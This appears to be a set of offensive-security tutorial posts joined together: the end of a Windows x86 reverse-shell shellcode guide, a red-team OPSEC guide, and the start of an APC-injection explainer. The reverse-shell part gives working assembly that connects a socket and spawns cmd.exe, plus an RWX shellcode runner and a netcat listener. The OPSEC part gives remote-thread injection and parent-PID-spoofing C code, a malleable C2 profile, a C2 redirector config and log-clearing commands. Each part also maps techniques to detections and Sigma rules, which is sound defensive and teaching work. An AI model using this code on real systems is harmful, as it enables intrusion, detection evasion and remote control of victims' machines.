    mov    esi, esp            ; esi -> SOCKADDR_IN

    push   eax                 ; lpCallee/QoS chain (NULLs)
    push   eax
    push   eax
    push   eax
    push   0x10                ; namelen
    push   esi                 ; name -> SOCKADDR_IN
    push   edi                 ; socket
    call   <WSAConnect>

7. Spawning cmd.exe Over the Socket

The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.

    xor    eax, eax
    push   edi                 ; hStdError  = socket
    push   edi                 ; hStdOutput = socket
    push   edi                 ; hStdInput  = socket
    times 9 push eax           ; zero lpReserved2..dwY (9 dwords)
    push   0x00000100          ; dwFlags = STARTF_USESTDHANDLES
    times 4 push eax           ; lpTitle, lpDesktop, lpReserved, wShowWindow pad
    push   0x44                ; cb = sizeof(STARTUPINFOA)
    mov    ebx, esp            ; ebx -> STARTUPINFOA

    sub    esp, 0x10
    mov    esi, esp            ; esi -> PROCESS_INFORMATION

    push   eax                 ; "....\0" terminator (runtime-supplied null)
    push   0x6578652e          ; ".exe"
    push   0x646d6320          ; " cmd"  (0x20 = space, null-free)
    mov    edx, esp            ; edx -> " cmd.exe"

    push   esi                 ; lpProcessInformation
    push   ebx                 ; lpStartupInfo
    push   eax                 ; lpCurrentDirectory
    push   eax                 ; lpEnvironment
    push   eax                 ; dwCreationFlags
    inc    eax
    push   eax                 ; bInheritHandles = TRUE
    dec    eax
    push   eax                 ; lpThreadAttributes
    push   eax                 ; lpProcessAttributes
    push   edx                 ; lpCommandLine = " cmd.exe"
    push   eax                 ; lpApplicationName = NULL
    call   <CreateProcessA>

    push   eax                 ; uExitCode
    call   <ExitProcess>

Sequential flowchart of the full reverse shell execution chain from PEB walk through export parsing, Winsock initialisation, TCP connect, STARTUPINFOA setup, and final CreateProcessA call spawning cmd.exe — Every stage builds on the last: the PEB walk feeds export parsing, which unlocks Winsock, which provides the socket handle wired into cmd.exe’s standard I/O.

8. Null-Byte Elimination and Bad-Character Audit

A single \x00 mid-payload can truncate your shellcode. Design it out from the start.

Bad Byte	Naive Source	Null-Free Replacement
`\x00`	`mov ecx, 0`	`xor ecx, ecx`
`\x00` in string	`push 0x00657865` (“exe\0”)	terminator from `push eax` after `xor eax,eax`
`\x00` in `mov al,0`	`mov al, 0`	`xor eax, eax` then use `al`
`\x0a` / `\x0d`	constant containing CR/LF	re-encode IP/port or split the immediate

The runtime-supplied terminator trick (xor eax, eax → push eax) keeps the " cmd.exe" string null-free, and the leading space the space-padded " cmd" introduces is tolerated by CreateProcessA‘s command-line parser. Audit the assembled binary with a scanner:

import sys
BAD = {0x00, 0x0a, 0x0d}                # extend per injection vector

with open(sys.argv[1], "rb") as f:
    sc = f.read()
for i, b in enumerate(sc):
    if b in BAD:
        print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")

9. Testing and Verification

Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.

nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin

#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };

int main(void) {
    void *mem = VirtualAlloc(NULL, sizeof(sc),
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);   // RWX: loud, lab-only
    memcpy(mem, sc, sizeof(sc));
    ((void(*)())mem)();
    return 0;
}

Catch the callback with nc -lvnp 4444. Note the RWX allocation — real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.

10. Common Attacker Techniques

Technique	Description
PEB walk	Locate `kernel32.dll` base with no imports via `FS:[0x30]`
Export hashing	Resolve APIs by name hash to stay small and null-free
Stack string building	Push reversed dwords to stage `" cmd.exe"`, `ws2_32.dll`, API names
STDIO redirection	Point `hStdInput/Output/Error` at the socket for an interactive shell
Process injection	Deliver the blob via `VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread`
RWX → RX staging	Allocate `RW`, copy, `VirtualProtect` to `RX` to evade RWX heuristics

11. Defensive Strategies and Detection

Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.

Sysmon Event ID	Name	What It Catches
`1`	Process Create	`cmd.exe` with an unexpected `ParentImage` / `ParentCommandLine`
`3`	Network Connection	Outbound TCP from `cmd.exe` or a non-browser binary (C2 connect-back)
`8`	CreateRemoteThread	Cross-process thread where `SourceImage` ≠ `TargetImage`
`10`	ProcessAccess	`GrantedAccess` to injected memory; `CallTrace` containing `UNKNOWN`
`11`	FileCreate	Shellcode or loader dropped to disk

Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.

The canonical community Sigma rule for shellcode injection keys on ProcessAccess:

title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
  category: process_access
  product: windows
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
tags:
  - attack.defense_evasion
  - attack.privilege_escalation
  - attack.t1055
level: high

Hardening: enable command-line auditing, deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10, enforce default-deny egress on workstations (reverse shells need outbound TCP), apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office child processes) and d3e037e1-3eb8-44c8-a917-57927947596d (block untrusted processes from removable media), and alert on VirtualAlloc(RWX). AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.

Hierarchy diagram mapping each shellcode execution stage to its corresponding detection telemetry source including Windows Event IDs, Sysmon event IDs, ETW providers, ASR rules, and egress firewall controls — Effective defence maps detections to each stage of the kill chain rather than relying on a single indicator — RWX allocation, outbound TCP, and process creation each emit distinct, correlatable telemetry.

12. Tools for Shellcode Analysis

Tool	Description	Link
NASM	Assemble x86 to flat binary	`nasm.us`
WinDbg	Step the PEB walk and export parse live	`microsoft.com`
x64dbg	Dynamic analysis of the loader and payload	`x64dbg.com`
Ghidra	Static disassembly of extracted shellcode	`ghidra-sre.org`
Radare2	Lightweight disassembly and patching	`radare.org`
Sysmon	Generate EID 1/3/8/10 detection telemetry	`microsoft.com`
Volatility	Memory forensics — recover RWX regions and injected code	`volatilityfoundation.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Command and Scripting Interpreter: Windows Command Shell	`T1059.003`	Sysmon EID 1 / 4688 `cmd.exe` spawn chain
Process Injection	`T1055`	Sysmon EID 10 `GrantedAccess` + `CallTrace UNKNOWN`
Process Injection: DLL Injection	`T1055.001`	Sysmon EID 7/8 on reflective-DLL delivery
Obfuscated Files or Information	`T1027`	Null-free/encoded IP/port constants in the blob
Non-Application Layer Protocol	`T1095`	Sysmon EID 3 / 5156 raw TCP from non-browser process
Application Layer Protocol: Web Protocols	`T1071.001`	Proxy/TLS inspection (contrast C2 transport)
System Information Discovery	`T1082`	PEB walk as in-memory module discovery
Native API	`T1106`	Direct `WSASocketA` / `CreateProcessA` calls without framework APIs

Summary

A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects cmd.exe over it.
The PEB walk (FS:[0x30] → Ldr → InMemoryOrderModuleList, third entry) locates kernel32.dll with no imports.
Parsing the PE export table resolves GetProcAddress, which bootstraps LoadLibraryA and every Winsock function.
Null-byte and bad-character avoidance is a design constraint, not a post-step — xor for zero, reversed stack strings, runtime-supplied terminators.
Det

References

OPSEC Principles for Red Teamers: Staying Undetected

Objective: Understand the operational security discipline an authorized red teamer must apply across infrastructure, process execution, network traffic, and on-disk artifacts to minimize detection surface, and learn the corresponding telemetry defenders use to catch each OPSEC failure.

1. What OPSEC Means for Red Teamers

Operational security is the discipline that separates a noisy penetration test from a realistic adversary simulation. A red team engagement that triggers every EDR sensor on the first beacon delivers a process audit, not a threat-emulation result. Every action — every API call, every DNS query, every dropped file — generates a detection signature. Strong OPSEC means knowing precisely what artifacts each action produces and either avoiding the action, blending it into noise, or accepting the risk consciously.

This tutorial is written for authorized red teamers and the blue teams who hunt them. Every offensive technique is paired with the exact telemetry that exposes it, so operators can self-audit and defenders can close the loop.

2. The Five-Step OPSEC Cycle Applied to Red Teaming

The classic OPSEC process, adapted to an offensive engagement:

Step	Action	Red Team Application
1	Identify critical information	Tooling names, operator IPs, attacker hostnames, C2 domains, callback patterns
2	Analyze threats	EDR vendor, NDR, SIEM rule set, threat-hunt team maturity
3	Analyze vulnerabilities	Which artifacts each TTP leaves (Sysmon ID, ETW provider, file path)
4	Assess risk	Likelihood × impact of each artifact being correlated
5	Apply countermeasures	Malleable profiles, LOLBins, in-memory execution, in-scope log suppression

Operators run this loop before each phase — initial access, lateral movement, persistence, exfiltration — not once at the start of the engagement.

Flowchart of the five-step OPSEC cycle: Identify Critical Info, Analyze Threats, Identify Vulnerabilities, Assess Risk, Apply Countermeasures, looping back for each engagement phase — The OPSEC cycle is executed before every engagement phase — initial access, lateral movement, persistence, and exfiltration — not just once at kickoff.

3. Thinking Like a Sensor: The Defender’s Telemetry Stack

You cannot evade what you do not understand. Modern defenders correlate signals from at least five overlapping layers:

Sensor Layer	What it sees
Sysmon	Process create, network connect, image load, thread injection, pipe create, DNS query
ETW	Kernel-level process/thread events, `Microsoft-Windows-Threat-Intelligence`, PowerShell script block logging
AMSI	In-process scan of script content before execution
EDR	Userland API hooks, kernel callbacks, behavioral chains
NDR / SIEM	Beacon periodicity, JA3/JA4 fingerprints, DNS anomalies, log correlation

The Microsoft-Windows-Threat-Intelligence provider deserves a callout: it is PPL-protected and is the primary ETW source EDRs use for injection telemetry. Any attempt to disable it is itself a high-fidelity alert (T1562.001).

4. Infrastructure OPSEC: Redirectors, Domains, and Segmentation

If your C2 team server is exposed directly to the target network, a single block at the perimeter ends the engagement. Infrastructure OPSEC is about layering the chain so that the loud parts are disposable.

Component	OPSEC Detail
Redirectors	Apache `mod_rewrite` or Nginx reverse proxies between implant and team server; filter on URI, User-Agent, and source ASN
Categorized / aged domains	Domains > 90 days old, plausible web presence, Whois privacy, matching TLS certificates from a real CA
TLS hygiene	Avoid default self-signed Cobalt Strike certs; serve a valid LetsEncrypt or commercial cert matching the fronted domain
Provider segmentation	Spread redirectors, payload hosts, and team servers across multiple providers and regions; a defender who blocks one ASN should not break the entire kill chain
Domain fronting / CDN abuse	TLS SNI presents a fronted CDN host while the `Host:` header routes to the operator’s origin (`T1090.004`)

A minimal Nginx redirector enforcing path-based filtering:

server {
    listen 443 ssl;
    server_name updates.example-cdn.com;

    ssl_certificate     /etc/letsencrypt/live/.../fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/.../privkey.pem;

    # Drop anything that isn't on the expected beacon URI
    if ($uri !~* "^/(api/v2/telemetry|cdn/assets)") {
        return 404;
    }

    # Drop scanners and unexpected User-Agents
    if ($http_user_agent !~* "Mozilla/5\.0.*Chrome") {
        return 404;
    }

    location / {
        proxy_pass https://teamserver.internal:8443;
        proxy_set_header Host $host;
    }
}

Architecture diagram showing C2 infrastructure layering from target network through an Nginx redirector and CDN proxy to a protected team server and operator console — Disposable redirector layers isolate the team server — blocking the front-facing node ends the beacon path, not the engagement.

5. Malleable C2 Profiles and Traffic Shaping

Default C2 profiles are signatured. A malleable profile rewrites every byte the beacon puts on the wire so traffic blends with expected enterprise patterns.

http-get {
    set uri "/api/v2/telemetry";
    client {
        header "Host" "updates.example-cdn.com";
        header "Accept" "application/json";
        metadata {
            base64url;
            prepend "session=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "application/json";
        output {
            base64;
            prepend "{\"status\":\"ok\",\"data\":\"";
            append "\"}";
            print;
        }
    }
}

http-post {
    set uri "/api/v2/upload";
    client {
        header "Content-Type" "application/octet-stream";
        id { base64url; parameter "tid"; }
        output { base64; print; }
    }
}

Key directives: the metadata transform hides session state in a cookie; Host: masquerades as a CDN; URIs match a believable application path. The corresponding http-stager, process-inject, and post-ex blocks must also be customized — default stager URIs are the number-one Cobalt Strike fingerprint.

6. Process & Memory OPSEC

The classic injection triad is also the most signatured behavior in Windows. The following is shown as a “what not to do naively” reference — every line annotates the telemetry it produces:

// VirtualAllocEx in remote PID -> Sysmon EID 10 (PROCESS_VM_OPERATION)
LPVOID rbuf = VirtualAllocEx(hProc, NULL, sz,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);  // RWX = EDR red flag

// WriteProcessMemory                 -> Sysmon EID 10 (PROCESS_VM_WRITE)
WriteProcessMemory(hProc, rbuf, sc, sz, NULL);

// CreateRemoteThread                 -> Sysmon EID 8 (CreateRemoteThread)
HANDLE hThr = CreateRemoteThread(hProc, NULL, 0,
                                 (LPTHREAD_START_ROUTINE)rbuf,
                                 NULL, 0, NULL);

Quieter alternatives reduce — but do not eliminate — visibility:

Section-based injection via NtMapViewOfSection (T1055.004) avoids WriteProcessMemory but is still observable via Threat-Intelligence ETW.
APC injection via NtQueueApcThread triggers only when the target thread enters an alertable wait.
Reflective DLL / PE loading (T1620) avoids LoadLibrary and Sysmon Event ID 7 module-load entries for the malicious DLL path.
Direct / indirect syscalls (the SysWhispers3 pattern) bypass userland EDR hooks by invoking NTAPI numbers via the syscall instruction.
Allocate RW, then VirtualProtect to RX — never request PAGE_EXECUTE_READWRITE directly.

Process selection matters as much as the technique. notepad.exe initiating an outbound connection is anomalous; a browser or svchost.exe doing so is not.

Hierarchy diagram comparing process injection techniques from the high-visibility classic VirtualAllocEx triad down to quieter alternatives including direct syscalls and reflective DLL loading, annotated with their telemetry exposure — Injection technique selection directly controls which EDR and ETW sensors fire — quieter methods reduce surface but none are invisible to kernel-level telemetry.

7. Parent PID Spoofing

Parent-child chains are one of the cheapest behavioral detections. Spoofing the parent via UpdateProcThreadAttribute breaks the chain so a payload launched from a phishing macro can claim explorer.exe as its parent (T1134.004).

STARTUPINFOEXA si = { 0 };
PROCESS_INFORMATION pi = { 0 };
SIZE_T attrSize = 0;

si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize);
si.lpAttributeList = HeapAlloc(GetProcessHeap(), 0, attrSize);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize);

HANDLE hParent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, explorerPid);
UpdateProcThreadAttribute(si.lpAttributeList, 0,
    PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
    &hParent, sizeof(HANDLE), NULL, NULL);

CreateProcessA(NULL, "C:\\Windows\\System32\\cmd.exe", NULL, NULL, FALSE,
               EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
               &si.StartupInfo, &pi);

The spoofed parent appears in Sysmon Event ID 1’s ParentProcessId and ParentImage fields. Detection: correlate ParentImage with the CreatingProcessId recorded by EDR kernel callbacks — they will disagree on a spoofed launch.

8. Network OPSEC: Sleep, Jitter, and Protocol Blending

A beacon calling back every 60 seconds on the dot is trivially clustered by an NDR. Add jitter:

import random, time

def beacon_sleep(base_seconds: int, jitter_pct: int) -> None:
    delta = base_seconds * (jitter_pct / 100.0)
    interval = base_seconds + random.uniform(-delta, +delta)
    # 60s base, 30% jitter -> 42s..78s
    time.sleep(interval)

A 60s ± 30% schedule destroys naive periodicity heuristics; longer sleeps (3600s ± 50%) defeat most short-window NDR baselines but cost interactivity. Match channel to environment:

Channel	When to use
HTTPS	Default; blends with web traffic if profile is well-tuned (`T1071.001`)
DNS (TXT/A)	Egress-restricted networks; low bandwidth, noisy on Sysmon EID 22 (`T1071.004`)
SMB named pipe	Lateral peer-to-peer beaconing; avoid default `msagent_*` pipe names
Domain-fronted HTTPS	Where CDN egress is allowed and DPI cannot inspect SNI (`T1090.004`)

9. LOLBins and In-Memory Execution

Living-off-the-Land Binaries (LOLBins) are signed Microsoft binaries that proxy execution and inherit trust. The trade-off is that they are now heavily monitored — rundll32.exe spawned by winword.exe is a textbook ASR trigger.

Binary	Common Abuse
`rundll32.exe`	Execute exported function from a DLL (`T1218.011`)
`regsvr32.exe`	Squiblydoo: scriptlet execution (`T1218.010`)
`mshta.exe`	HTA / inline VBScript execution (`T1218.005`)
`wmic.exe`	Process invocation; deprecated but still present
`certutil.exe -decode`	Decode staged base64 payloads (`T1140`)

In-memory execution avoids disk artifacts entirely:

BOFs (Beacon Object Files) execute small COFF objects inside the implant process — no new process, no file on disk.
Assembly.Load() loads a .NET assembly from a byte array, bypassing Image Load events for the managed module on disk.
Reflective DLL loading maps a DLL without invoking the loader, so it never appears in LoadLibrary audit paths.

A note on PowerShell: powershell -enc <base64> looks obfuscated and is logged by Sysmon Event ID 1 in its decoded form once Script Block Logging is enabled. AMSI sees the deobfuscated content immediately before execution. Encoding is not evasion against a modern stack.

10. Artifact & Log OPSEC

Cleaning up is part of the engagement — but cleanup itself is loud.

Action	ATT&CK	OPSEC Caveat
Timestomping	`T1070.006`	`NtSetInformationFile` with `FileBasicInformation` rewrites `$STANDARD_INFORMATION`; `$FILE_NAME` MFT attribute is not updated and remains forensically accurate
Event log clearing	`T1070.001`	`wevtutil cl Security` generates Event ID 1102 (Security) / 104 (System) — the act of clearing is itself the alert
Disabling ETW	`T1562.002`	Patching `EtwEventWrite` in-process is in-memory only and not logged — but Threat-Intelligence provider observes the patch via kernel callbacks on PPL-aware EDRs
File deletion	`T1070.004`	NTFS `$MFT` entries persist; Volume Shadow Copies retain prior versions; USN journal records the unlink

Rule of thumb: do not clear logs unless the engagement scope explicitly authorizes it. Selective in-process ETW suppression is quieter, scope-limited, and reversible.

11. The OPSEC Operator Checklist

Phase	Check
Pre-op	Hostnames renamed off `kali`; tool hashes scrubbed; C2 profile validated against default-detection rules
Pre-op	Domains aged > 90 days, valid TLS certs, redirector ACLs in place, infra segmented across providers
Pre-op	Beacon sleep + jitter set; default pipe names changed; default `Spawnto_x64` rewritten
During	Prefer in-memory execution (BOF, reflective, `Assembly.Load`); avoid disk staging
During	Spoof PPIDs where parent-child chains would otherwise flag; pick injection targets that already make network calls
During	Never run Mimikatz from disk; use in-memory credential access only with explicit authorization
During	Modify existing services rather than creating new ones (avoids Event ID 7045)
Post-op	Remove staging artifacts; never clear Security/System logs unless scope explicitly authorizes it
Post-op	Document every artifact for the client report — defenders need the IOC list for purple-team validation

12. Common Attacker Techniques

Technique	Description
Classic remote thread injection	`VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread` — most signatured behavior on Windows
APC injection	`NtQueueApcThread` into alertable threads (`T1055.004`)
Process hollowing	`CreateProcess` suspended → unmap → write → `ResumeThread` (`T1055.012`)
Parent PID spoofing	`PROC_THREAD_ATTRIBUTE_PARENT_PROCESS` to break parent-child chain (`T1134.004`)
Direct / indirect syscalls	Bypass userland API hooks via `syscall` instruction
Reflective DLL loading	Map DLL without `LoadLibrary` (`T1620`)
ETW / AMSI patching	In-process patch of `EtwEventWrite` / `AmsiScanBuffer` (`T1562.001`)
LOLBin proxied execution	`rundll32`, `regsvr32`, `mshta` (`T1218`)
Domain fronting	CDN-fronted TLS to mask C2 destination (`T1090.004`)
Timestomping	Rewrite `$STANDARD_INFORMATION` MACE timestamps (`T1070.006`)

13. Defensive Strategies & Detection

The OPSEC failures above map directly to telemetry. Defenders should focus on behavior chains, not isolated IOCs — fixating on hashes catches yesterday’s adversary.

Sysmon Event ID	Captures	OPSEC Failure It Catches
`1`	Process Create + CommandLine + ParentImage	LOLBin abuse, PPID-spoof inconsistencies, encoded PowerShell
`3`	Network Connection	Beacon callbacks; non-network processes (`notepad.exe`) initiating connections
`7`	Image Loaded	Unusual DLL load paths; signed-binary side-loading (`T1574`)
`8`	CreateRemoteThread	Classic injection triad (`T1055.001`)
`10`	ProcessAccess	`GrantedAccess` masks like `0x1010` against `lsass.exe` (`T1003.001`)
`11`	FileCreate	Staging artifacts in `%TEMP%`, `%PUBLIC%`, `\ProgramData\`
`17` / `18`	Pipe Created / Connected	Default Beacon pipe names (`msagent_`, `status_`, `postex_*`)
`22`	DNS Query	DNS C2 (`T1071.004`) — high-frequency TXT/A to uncommon domains

A Sigma sketch for the most common parent-spoof + LOLBin pattern:

title: Office Application Spawning rundll32 via Spoofed Parent
logsource:
  product: windows
  service: sysmon
detection:
  selection_proc:
    EventID: 1
    Image|endswith: '\rundll32.exe'
    ParentImage|endswith:
      - '\explorer.exe'
      - '\svchost.exe'
  selection_cmd:
    CommandLine|contains:
      - ',DllRegisterServer'
      - 'javascript:'
      - 'shell32.dll,Control_RunDLL'
  filter_signed_paths:
    CurrentDirectory|startswith: 'C:\Windows\System32\'
  condition: selection_proc and selection_cmd and not filter_signed_paths
level: high

Windows Security audit events to enable: 4688 (process creation with command line), 4698 (scheduled task), 7045 (new service), 1102 (Security log cleared), 4656/4663 (object access via SACL). Enable PowerShell Script Block Logging and Module Logging via GPO. Set HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1 to protect LSASS, deploy Credential Guard, and enforce ASR rules blocking Office child-process spawning and LSASS credential theft. A misconfigured Sysmon ruleset is the single most common reason behavior-based detection fails — deploy a tuned config (e.g., SwiftOnSecurity or olafhartong’s modular config) and review it quarterly.

Graph diagram mapping defender telemetry sources — Sysmon, ETW, AMSI, and Sigma rules — to the attacker OPSEC failures they detect, including process injection, LOLBin execution, PowerShell obfuscation, and PPID spoofing — Defenders correlate overlapping telemetry layers into behavior chains — no single sensor catches everything, but their intersection eliminates most OPSEC blind spots.

14. Tools for Red Team OPSEC Analysis

Tool	Description	Link
Sysmon	Microsoft endpoint telemetry agent — the primary source for behavioral detection	sysinternals.com
SwiftOnSecurity / olafhartong configs	Community Sysmon configurations tuned for detection coverage	github.com
Process Hacker	Inspect injected memory regions, RWX allocations, suspicious threads	processhacker.sourceforge.io
Process Monitor	File, registry, and process activity tracing during purple-team replay	sysinternals.com
Sigma	Generic SIEM detection rule format used in this post	sigmahq.io
Velociraptor	DFIR + hunt agent; runs VQL queries across the estate	velociraptor.app
Volatility 3	Memory forensics — detects reflective loads, injected sections, hollowed processes	volatilityfoundation.org
SilkETW / SealighterTI	Surface `Microsoft-Windows-Threat-Intelligence` and other ETW providers	github.com
Wireshark / Zeek	Network analysis for beacon periodicity, JA3/JA4 fingerprints, DNS C2	zeek.org

15. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Process Injection	`T1055`	Sysmon EID 8/10; Threat-Intelligence ETW
DLL Injection	`T1055.001`	Sysmon EID 8 with `TargetImage`
APC Injection	`T1055.004`	Threat-Intelligence ETW; EDR kernel callbacks
Process Hollowing	`T1055.012`	Image base mismatch; memory forensics (Volatility)
Parent PID Spoofing	`T1134.004`	Sysmon EID 1 `ParentImage` vs EDR `CreatingProcessId` mismatch
Obfuscated Files / Info	`T1027`	PowerShell Script Block Logging; AMSI
Clear Windows Event Logs	`T1070.001`	Event ID 1102 / 104
Timestomp	`T1070.006`	`$FILE_NAME` vs `$STANDARD_INFORMATION` divergence in MFT
Web Protocols C2	`T1071.001`	NDR JA3/JA4 + URI anomalies
DNS C2	`T1071.004`	Sysmon EID 22; DNS-Client ETW
Proxy / Redirector	`T1090`	Outbound destination ASN baseline drift
Domain Fronting	`T1090.004`	SNI vs `Host:` header divergence (where TLS inspection exists)
System Binary Proxy Execution	`T1218`	Sysmon EID 1 LOLBin command-line patterns
Disable or Modify Tools	`T1562.001`	Threat-Intelligence ETW; EDR self-protection alerts
Disable Event Logging	`T1562.002`	Audit policy change events; ETW provider state
Reflective Code Loading	`T1620`	Memory forensics; RWX private region scans

16. Summary

OPSEC is the discipline of knowing exactly what telemetry every offensive action produces, and making conscious risk decisions about each one.
The five-step OPSEC cycle (identify, threat, vuln, risk, countermeasure) is run before each engagement phase, not once at kickoff.
Infrastructure OPSEC layers redirectors, aged categorized domains, segmented providers, and customized malleable C2 profiles — defaults are signatured.
Process and network OPSEC favor in-memory execution (BOF, reflective load, Assembly.Load), PPID spoofing, sensible injection-target selection, and sleep + jitter to destroy beacon periodicity.
Log and artifact suppression is a sharp tool: timestomping leaves $FILE_NAME evidence, wevtutil cl triggers Event ID 1102, and ETW patching is itself observed by the Threat-Intelligence provider.
Defenders close every loop with Sysmon, ETW, AMSI, and behavior-chain Sigma rules — focus on TTP chains, not IOCs, to catch operators who actually practice OPSEC.

References

APCs: Asynchronous Procedure Calls and Thread Hijacking Surface

Objective: Understand the Windows Asynchronous Procedure Call mechanism from the kernel up — the KAPC / KAPC_STATE structures, the dispatch path through KiInsertQueueApc and KiDeliverApc, the alertable-wait requirement, and the three abuse variants (classic, early-bird, special user APC) used for thread hijacking and process injection — and detect them with Sysmon, ETW-TI, and audit policy.

1. APC Fundamentals — What the OS Actually Uses APCs For

An Asynchronous Procedure Call is a function that executes asynchronously in the context of a specific thread. When the kernel queues an APC, it raises a software interrupt and arranges for the routine to run the next time that thread is dispatched. Every thread has its own APC queue — APCs are inherently thread-targeted, which is exactly why offensive tooling loves them.

The OS itself relies on APCs for normal work:

I/O completion: ReadFileEx, WriteFileEx, and SetWaitableTimer deliver their completion callback via a user-mode APC queued back to the issuing thread.
File-system filter callbacks: normal kernel APCs are widely used by file systems and minifilters.
Wait abortion: queuing a user APC against a thread in an alertable wait satisfies the wait with STATUS_USER_APC.

Understanding APCs means understanding three things in sequence: who can queue them, when they fire, and what the thread looks like at the moment they fire.

2. The Three Flavours of APCs

APCs differ by IRQL and by who is allowed to queue them. The kernel maintains distinct semantics for each.

Type	IRQL	Notes
Special Kernel APC	`APC_LEVEL`	Runs in kernel mode at IRQL `APC_LEVEL`; preempts user-mode code and kernel-mode code executing at `PASSIVE_LEVEL`. Used by the OS for operations such as I/O request completion.
Normal Kernel APC	`PASSIVE_LEVEL`	Runs in kernel mode at `PASSIVE_LEVEL`; preempts all user-mode code, including user APCs. Generally used by file systems and file-system filter drivers.
User-mode APC	`PASSIVE_LEVEL`	Generated by an application. The target thread must be in an alertable state for a user-mode APC to run.

Unlike deferred procedure calls (DPCs), which run in arbitrary thread context, an APC always executes inside a specific thread’s context — that property is what makes APCs both useful for I/O completion and dangerous as an injection primitive.

Hierarchy diagram showing the three APC types: Kernel-Mode, User-Mode, and Special User APC, with their respective queuing APIs and alertable-wait requirements — The three APC flavours differ by privilege level, delivery trigger, and the Win32/native APIs used to queue them.

3. Kernel Structures: `KAPC`, `KAPC_STATE`, `KTHREAD`

A queued APC is represented in the kernel by a KAPC object. The thread tracks its pending APCs via a KAPC_STATE embedded in KTHREAD.

// Conceptual layout — field names are illustrative; confirm against the
// target Windows build with `dt nt!_KAPC` / `dt nt!_KAPC_STATE` in WinDbg.

typedef struct _KAPC {
    UCHAR              Type;
    UCHAR              SpareByte0;
    UCHAR              Size;
    UCHAR              SpareByte1;
    ULONG              SpareLong0;
    struct _KTHREAD   *Thread;
    LIST_ENTRY         ApcListEntry;
    PKKERNEL_ROUTINE   KernelRoutine;
    PKRUNDOWN_ROUTINE  RundownRoutine;
    PKNORMAL_ROUTINE   NormalRoutine;
    PVOID              NormalContext;
    PVOID              SystemArgument1;
    PVOID              SystemArgument2;
    CCHAR              ApcStateIndex;
    KPROCESSOR_MODE    ApcMode;
    BOOLEAN            Inserted;
} KAPC, *PKAPC;

typedef struct _KAPC_STATE {
    LIST_ENTRY         ApcListHead[2];   // [0] = kernel APCs, [1] = user APCs
    struct _KPROCESS  *Process;
    BOOLEAN            KernelApcInProgress;
    BOOLEAN            KernelApcPending;
    BOOLEAN            UserApcPending;
    // SpecialUserApcPending was added later for RS5+ Special User APCs.
} KAPC_STATE, *PKAPC_STATE;

Key fields the dispatcher and attackers both care about:

KAPC.NormalRoutine — the function the thread will eventually execute.
KAPC.NormalContext, SystemArgument1, SystemArgument2 — arguments passed to NormalRoutine.
KAPC.ApcMode — KernelMode vs UserMode, controls which queue and which delivery path.
KAPC_STATE.ApcListHead[2] — two doubly-linked lists; index 0 holds kernel-mode APCs, index 1 holds user-mode APCs.
KAPC_STATE.UserApcPending — set to TRUE when a user APC is queued and the thread is in an alertable wait; this is the signal that breaks the wait with STATUS_USER_APC.

4. The Alertable Wait Requirement

A user-mode APC does not fire whenever the kernel wants — it fires only when the target thread is willing to be interrupted. A thread enters an alertable state by calling one of:

SleepEx()
SignalObjectAndWait()
MsgWaitForMultipleObjectsEx()
WaitForMultipleObjectsEx()
WaitForSingleObjectEx()

with the bAlertable parameter set to TRUE. Additionally, ReadFileEx, WriteFileEx, and SetWaitableTimer are themselves implemented using APCs as their completion-notification mechanism — so threads driving overlapped I/O routinely sit in alertable waits.

This alertable-state requirement is the single most important property to understand offensively and defensively:

Offensively, it dictates target selection. Long-lived service threads in svchost.exe or explorer.exe that pump I/O are reliable targets; threads that never enter an alertable wait will never run a queued user APC.
Defensively, it explains why the classic injection works against some processes and not others — and why attackers eventually moved to Special User APCs to remove the dependency entirely (§9).

5. Win32 → Native → Kernel Call Chain

Queuing a user APC traverses three layers.

API / Symbol	Layer	Description
`QueueUserAPC`	Win32 (`kernel32.dll`)	Queues a user-mode APC to a target thread.
`NtQueueApcThread`	NT native (`ntdll.dll`)	Syscall used internally by `QueueUserAPC` to deliver the APC.
`NtQueueApcThreadEx`	NT native	Extended form; RS5 introduced Special User APCs queued by passing `1` as the reserve handle.
`NtQueueApcThreadEx2`	NT native	Newer variant exposing both `UserApcFlags` and `MemoryReserveHandle`.
